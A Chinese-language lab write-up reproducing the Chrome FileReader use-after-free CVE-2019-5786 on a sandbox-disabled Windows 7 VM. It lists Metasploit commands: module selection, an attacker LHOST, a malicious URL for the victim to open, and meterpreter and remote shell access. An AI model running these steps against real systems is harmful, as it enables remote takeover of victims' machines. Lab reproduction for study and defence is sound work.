CVE-2019-5786(chrome_filereader_uaf)漏洞复现

漏洞详情

由FileReader上的UAF漏洞可造成Chrome的远程代码执行。

针对Windows7x86系统,Chrome版本72.0.3626.119。

实际利用时,要配合其他漏洞如CVE-2019-0808来绕过Chrome沙箱才可以利用成功。

漏洞利用

环境

受害者:win7x86虚拟机 + Chrome浏览器

攻击者:MacOS + Metaspolit

步骤

进入Chrome安装位置,执行命令 以关闭沙箱的方式启动

1
chrome.exe --no-sandbox

image-20200630213752635

启动msf,加载模块,设置参数,执行攻击,拿到shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# 启动msf
msfconsole
# 搜索并选择
search CVE-2019-5786
use 0
# 查看要设置哪些参数
show options
# 只用设置攻击者监听IP就可以
set LHOST 192.168.0.5
# 执行
run
# Chrome访问生成的URL
# http://192.168.0.5:8080/9rBZXKhXHX3og3
# 等几秒可以获取到session
session -i 1
# 选择该session获取meterpreter会话,sysinfo查看系统信息
sysinfo
# 也可以直接获取目标机CMD
shell
# 更改目标机编码为utf-8,解决显示乱码
chcp 65001
# 弹出计算器
calc

image-20200701110357248

image-20200701110512878

image-20200701110201446

image-20200701110717635

image-20200701111415202

image-20200701111522119

image-20200701111552624

image-20200630214610496

推荐阅读